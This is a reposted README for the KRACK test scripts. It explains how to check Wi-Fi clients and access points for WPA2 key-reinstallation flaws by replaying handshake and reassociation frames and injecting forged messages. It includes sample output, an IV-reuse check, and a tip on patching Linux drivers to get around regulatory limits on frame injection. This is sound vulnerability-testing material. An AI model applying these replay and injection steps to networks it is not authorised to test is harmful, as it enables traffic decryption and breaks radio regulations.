./krack-test-client.py --group. This tests whether the client reinstalls the group key in the group key handshake. In other words, it tests if the client is vulnerable to CVE-2017-13080. The script tests for reinstallations of the group key by sending broadcast ARP requests to the client using an already used (replayed) packet number (here packet number = nonce = IV). Note that if the client always accepts replayed broadcast frames (see --replay-broadcast), this test might incorrectly conclude the group key is being reinstalled.

./krack-test-client.py. This tests for key reinstallations in the 4-way handshake by repeatedly sending encrypted message 3's to the client. In other words, this tests for CVE-2017-13077 (the vulnerability with the highest impact) and for CVE-2017-13078.
The script monitors traffic sent by the client to see if the pairwise key is being reinstalled. Note that this effectively performs two tests: whether the pairwise key is reinstalled, and whether the group key is reinstalled. Make sure the client requests an IP using DHCP for the group key reinstallation test to start. To assure the client is sending enough unicast frames, you can optionally ping the AP: ping

./krack-test-client.py --tptk. Identical to test 4, except that a forged message 1 is injected before sending the encrypted message 3. This variant of the test is important because some clients (e.g. wpa_supplicant v2.6) are only vulnerable to pairwise key reinstallations in the 4-way handshake when a forged message 1 is injected before sending a retransmitted message 3.

./krack-test-client.py --tptk-rand. Same as the above test, except that the forged message 1 contains a random ANonce.

./krack-test-client.py --gtkinit. This tests whether the client installs the group key in the 4-way handshake with the given receive sequence counter (RSC). The script will continuously execute new 4-way handshakes to test this. Unfortunately, any missed handshake messages cause synchronization issues, making this test rather unreliable. You should only execute it in environments with little background noise, and execute it several times.

Some additional remarks:

The most important test is ./krack-test-client.py, which tests for ordinary key reinstallations in the 4-way handshake.

Perform these tests in a room with little interference. A high amount of packet loss will make this script less reliable!

Optionally you can manually inspect network traffic to confirm the output of the script (some Wi-Fi NICs may interfere with our scripts):

Use an extra Wi-Fi NIC in monitor mode to confirm that our script (the AP) sends out frames using the proper packet numbers (IVs).
In particular, check whether replayed broadcast frames are indeed sent using an already used packet number (IV).

Use an extra Wi-Fi NIC in monitor mode to check pairwise key reinstalls by monitoring the IVs of frames sent by the client.

Capture traffic on the client to see if the replayed broadcast ARP requests are accepted or not.

If the client can use multiple Wi-Fi radios/NICs, perform the test using several Wi-Fi NICs.

You can add the --debug parameter for more debugging output. All unrecognized parameters are passed on to hostapd, so you can include something like -dd -K to make hostapd output all debug info.

Correspondence to Wi-Fi Alliance tests

The Wi-Fi Alliance created a custom vulnerability detection tool based on our scripts. At the time of writing, this tool is only accessible to Wi-Fi Alliance members. Their tool supports several different tests, and these tests correspond to the functionality in our script as follows:

4.1.1 (Plaintext retransmission of EAPOL Message 3). We currently do not support this test. This test is not necessary anyway: make sure the device being tested passes test 4.1.3, and then it will also pass this test.

4.1.2 (Immediate retransmission of EAPOL M3 in plaintext). We currently do not support this test. Again, make sure the device being tested passes test 4.1.3, and then it will also pass this test.

4.1.3 (Immediate retransmission of encrypted EAPOL M3 during pairwise rekey handshake). This corresponds to ./krack-test-client.py, except that encrypted EAPOL M3s are sent periodically instead of immediately.

4.1.5 (PTK reinstallation in 4-way handshake when STA uses Temporal PTK construction, same ANonce). Execute this test using ./krack-test-client.py --tptk.

4.1.6 (PTK reinstallation in 4-way handshake when STA uses Temporal PTK construction, random ANonce). Execute this test using ./krack-test-client.py --tptk-rand.

4.2.1 (Group key handshake vulnerability test on STA). Execute this test using ./krack-test-client.py --group.
4.3.1 (Reinstallation of GTK and IGTK on STA supporting WNM sleep mode). We currently do not support this test (and neither does the Wi-Fi Alliance, actually!).

Testing Access Points: Detecting a vulnerable FT Handshake (802.11r)

Create a wpa_supplicant configuration file that can be used to connect to the network. A basic example is:

ctrl_interface=/var/run/wpa_supplicant
network={
    ssid="testnet"
    key_mgmt=FT-PSK
    psk="password"
}

Note the use of "FT-PSK". Save it as network.conf or similar. For more info see wpa_supplicant.conf. Try to connect to the network using your platform's wpa_supplicant. This will likely require a command such as:

sudo wpa_supplicant -D nl80211 -i wlan0 -c network.conf

If this fails, either the AP does not support FT, or you provided the wrong network configuration options in step 1. Note that if the AP does not support FT, it is not affected by this vulnerability.

Use this script as a wrapper over the previous wpa_supplicant command:

sudo ./krack-ft-test.py wpa_supplicant -D nl80211 -i wlan0 -c network.conf

This will execute the wpa_supplicant command using the provided parameters, and will add a virtual monitor interface that will perform attack tests.

Use wpa_cli to roam to a different AP of the same network. For example:

sudo wpa_cli -i wlan0
> status
bssid=c4:e9:84:db:fb:7b
ssid=testnet
...
> scan_results
bssid / frequency / signal level / flags / ssid
c4:e9:84:db:fb:7b  2412  -21  [WPA2-PSK+FT/PSK-CCMP][ESS]  testnet
c4:e9:84:1d:a5:bc  2412  -31  [WPA2-PSK+FT/PSK-CCMP][ESS]  testnet
...
> roam c4:e9:84:1d:a5:bc
...

In this example we were connected to AP c4:e9:84:db:fb:7b of testnet (see the status command). The scan_results command shows this network also has a second AP with MAC c4:e9:84:1d:a5:bc. We then roam to this second AP.

Generate traffic between the AP and client. For example:

sudo arping -I wlan0

Now look at the output of ./krack-ft-test.py to see if the AP is vulnerable. First it should say "Detected FT reassociation frame".
Then it will start replaying this frame to attempt the attack. The script shows which IVs (= packet numbers) the AP is using when sending data frames. The message "IV reuse detected (IV=X, seq=Y). AP is vulnerable!" means we confirmed it's vulnerable. Be sure to manually check network traces as well, to confirm this script is replaying the reassociation request properly, and to manually confirm whether there is IV (= packet number) reuse or not.

Example output of a vulnerable AP:

[15:59:24] Replaying Reassociation Request
[15:59:25] AP transmitted data using IV=1 (seq=0)
[15:59:25] Replaying Reassociation Request
[15:59:26] AP transmitted data using IV=1 (seq=0)
[15:59:26] IV reuse detected (IV=1, seq=0). AP is vulnerable!

Example output of a patched AP (note that IVs are never reused):

[16:00:49] Replaying Reassociation Request
[16:00:49] AP transmitted data using IV=1 (seq=0)
[16:00:50] AP transmitted data using IV=2 (seq=1)
[16:00:50] Replaying Reassociation Request
[16:00:51] AP transmitted data using IV=3 (seq=2)
[16:00:51] Replaying Reassociation Request
[16:00:52] AP transmitted data using IV=4 (seq=3)

Extra: Hardware Decryption

To confirm that hardware decryption is disabled, execute systool -vm ath9k_htc or similar after plugging in your Wi-Fi NIC, to confirm the nohwcrypt/swcrypto/hwcrypto parameter has been set. Note that you must replace ath9k_htc with the kernel module for your wireless network card.

Extra: 5 GHz not supported

There's no official support for testing devices on the 5 GHz band. If you nevertheless want to use the tool on 5 GHz channels, the network card being used must allow the injection of frames on the 5 GHz channel. Unfortunately, this is not always possible due to regulatory constraints. To see on which channels you can inject frames, execute iw list and look under Frequencies for channels that are not marked as disabled, no IR, or radar detection.
Note that these conditions may depend on your network card, the currently configured country, and the AP you are connected to. For more information see, for example, the Arch Linux documentation.

Note that the Linux kernel may not allow the injection of frames even when sending normal frames is allowed. This is because in the function ieee80211_monitor_start_xmit the kernel refuses to inject frames when cfg80211_reg_can_beacon returns false. As a result, Linux may refuse to inject frames even though this is actually allowed. To work around this bug, you'll have to patch the Linux drivers so that cfg80211_reg_can_beacon returns true under the correct (or all) conditions, for instance by manually patching the backport driver code.

Extra: Manual Tests

It's also possible to manually perform (more detailed) tests by cloning the hostap git repository:

git clone git://w1.fi/srv/git/hostap.git

And following the instructions in tests/cipher-and-key-mgmt-testing.txt.

Sursa: https://github.com/vanhoefm/krackattacks-scripts
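The vulnerable-vs-patched traces shown earlier boil down to one check: does any packet number (IV) repeat after the replayed reassociation request? A minimal sketch of that check (not the actual krack-ft-test.py code; the (transmitter, iv) tuple layout is an assumption for illustration):

```python
# Each observed data frame is reduced to a (transmitter_address, iv)
# pair.  A patched AP keeps incrementing its IVs across replayed
# reassociation requests; a vulnerable AP resets the key and reuses IVs,
# which means the same key stream encrypts two different frames.
def find_iv_reuse(frames):
    seen = set()
    reused = []
    for addr, iv in frames:
        if (addr, iv) in seen:
            reused.append((addr, iv))  # same IV seen twice: key reuse
        seen.add((addr, iv))
    return reused

vulnerable_trace = [("ap", 1), ("ap", 1)]                       # IV=1 repeats
patched_trace = [("ap", 1), ("ap", 2), ("ap", 3), ("ap", 4)]    # always fresh

print(find_iv_reuse(vulnerable_trace))  # non-empty: AP is vulnerable
print(find_iv_reuse(patched_trace))     # empty: IVs never reused
```

This mirrors the manual verification the README recommends: capture frames in monitor mode and confirm, per transmitter, that no packet number is ever used twice.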